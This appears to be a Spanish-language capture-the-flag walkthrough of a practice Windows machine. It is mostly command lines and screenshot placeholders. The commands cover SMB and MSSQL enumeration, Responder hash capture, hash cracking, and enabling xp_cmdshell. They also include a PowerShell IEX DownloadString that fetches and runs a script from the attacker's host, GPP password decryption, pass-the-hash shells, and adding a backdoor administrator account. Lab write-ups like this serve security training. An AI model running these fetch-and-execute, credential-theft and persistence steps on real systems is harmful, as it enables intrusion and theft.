Cu3rv0x

nmap -p- --open -T5 -v -n 10.129.1.147

nmap -p- --open -T5 -v -n 10.129.1.147 --max-retries 0 -oG allPorts

Pasted image 20210812134529.png

extractPorts allPorts

Pasted image 20210812134843.png

nmap -sCV -pX 10.129.1.147 -oN targeted --version-intensity 0

Pasted image 20210812135536.png Pasted image 20210812134928.png

crackmapexec smb 10.129.1.147

Pasted image 20210812135140.png

smbclient -L 10.129.1.147 -N

Vemos que podemos accesar a Reports

Pasted image 20210812135437.png

Vemos que esta abierto el puerto 1433 que tiene ms-sql-s

locate mssqlclient.py

Pasted image 20210812140137.png

Pasted image 20210812140505.png

smbclient "//10.129.1.147/Reports/" -N

	get "Currency volume Report.xlsm"
	exit

Pasted image 20210812141049.png

olevba Currency Volume Report.xlsm

Pasted image 20210812141624.png

crackmapexec smb 10.129.1.147 -u 'reporting' -p 'PcwTWTHRwryjc$c6'

crackmapexec smb 10.129.1.147 -u 'reporting' -p 'PcwTWTHRwryjc$c6' -d WORKGROUP

Pasted image 20210812142358.png

Pasted image 20210812143116.png

Pasted image 20210812143902.png

Pasted image 20210812144052.png

Vemos el hash de NTLM

Pasted image 20210812144627.png

python2 /opt/Responder/Responder.py -I tun0 -rdw

Pasted image 20210812145020.png

xp_dirtree "\\10.10.14.108\si

Pasted image 20210812145716.png

john --wordlist=/usr/share/wordlists/rockyou.txt querier_hash.txt

Pasted image 20210812150001.png

crackmapexec 10.129.1.147 -u 'mssql-svc' -p 'corporate568' -d WORKGROUP

Pasted image 20210812150821.png

Pasted image 20210812151040.png

sp_configure "show advanced", 1

sp_configure "xp_cmdshell", 1

reconfigure

xp_cmdshell "whoami"

Pasted image 20210812151148.png

xp_cmdshell "ipconfig"

Pasted image 20210812151940.png

cp /home/kali/Desktop/boxes/Invoke-PowerShellTcp.ps1 .

python3 -m http.server 8888

Pasted image 20210812152306.png

Parece que un servicio pone por defecto las configuraciones anteriores.

Pasted image 20210812152438.png

ipconfig

puede ser potato

Pasted image 20210812152847.png

whoami /priv

Pasted image 20210812154319.png

Agregamos Invoke-AllChecks al final de Powerup.ps1

hacemos un python server

python3 -m http.server 8888

Pasted image 20210812154606.png

Pasted image 20210812154545.png

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.108:8888/PowerUp.ps1')

Pasted image 20210812154826.png

Podemos ver el servicio de UsoSvc. Los pasos estan en este wiki

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

Example with Windows 10 - CVE-2019-1322 UsoSvc

Pasted image 20210812160513.png

Vemos las credenciales encontradas en Groups.xml

Pasted image 20210812160705.png

Se puede ver el hash que se le asigna a cpassword

Pasted image 20210812160843.png

gpp-decrypt "HASH"

Vemos que es el mismo que MyUnclesAreMarioAndLuigi!!1!

Pasted image 20210812161013.png

crackmapexec smb 10.129.1.147 -u 'Administrator' -p 'MyUnclesAreMarioAndLuigi!!1!'

![[Pasted image 20210812161841.png]]

crackmapexec smb 10.129.1.147 -u 'Administrator' -p 'MyUnclesAreMarioAndLuigi!!1! -d WORKGROUP --sam'

Pasted image 20210812161841.png

python3 /opt/impacket/examples/smbexec.py WORKGROUP/Administrator@10.129.1.147 -hashes :2dcefe78334b42c0ce483b8e1b2886ab

Pasted image 20210812165648.png

net user cu3rv0x pass123 /add

Pasted image 20210812165815.png

net localgroup "Administrators" cu3rv0x /add

Pasted image 20210812165933.png

net share attacker_folder=C:\Windows\Temp /GRANT:Administrators, FULL

Pasted image 20210812170110.png

reg add HKLM\SOFTWARE\Microsoft\CurrentVersion\System\Policies /v LocalAccountTokentFilterPolicy /t REG_DWORD /d 1 /f

Pasted image 20210812170455.png

Pasted image 20210812170626.png

crackmapexec smb 10.129.1.147 -u 'cu3rv0x' -p 'pass123'

Pasted image 20210812164657.png

python3 /opt/impacket/examples/wmiexec.py WORKGROUP/Administrator@10.129.1.147 cmd.exe -hashes :2dcefe78334b42c0ce483b8e1b2886ab

Pasted image 20210812161431.png

python3 /opt/impacket/examples/psexec.py WORKGROUP/Administrator@10.129.1.147 cmd.exe

Pasted image 20210812161504.png